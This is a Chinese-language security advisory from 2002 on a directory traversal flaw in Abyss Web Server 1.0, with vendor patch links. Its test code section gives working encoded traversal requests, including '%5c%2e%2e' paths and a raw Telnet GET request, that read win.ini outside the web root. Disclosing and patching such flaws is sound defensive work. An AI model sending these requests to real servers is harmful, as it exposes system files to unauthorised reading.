Abyss Web Server存在目录遍历攻击发布时间:2002-08-29 更新时间:2002-08-29 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5547 受影响系统 Aprelium Technologies Abyss Web Server 1.0详细描述 Abyss Web Server存在目录遍历问题,由于不正确处理由UNICODE编码的'\'符号,攻击者使用包含 '%2e%2e%5c'代码的请求,可导致绕过ROOT目录限制,查看系统文件内容。 测试代码 http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini "GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0" (using a Telnet client) http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt/ http://host/%2f%2e%2e%2f http://host/%2f%2e%2e%2fcgi-bin/ 解决方案 升级程序: Aprelium Technologies Abyss Web Server 1.0: Aprelium Technologies Patch abyssws.exe http://www.aprelium.com/data/patch1033/abyssws.exe Windows patch. Aprelium Technologies Patch abyssws http://www.aprelium.com/data/patch1033/abyssws Linux patch. Aprelium Technologies Abyss Web Server 1.0.3: Aprelium Technologies Patch abyssws.exe http://www.aprelium.com/data/patch1033/abyssws.exe Windows patch. Aprelium Technologies Patch abyssws http://www.aprelium.com/data/patch1033/abyssws 相关信息 Auriemma Luigi <aluigi@pivx.com>. 参考:http://www.aprelium.com/abyssws/index.html http://www.aprelium.com/news/patch1033.html |
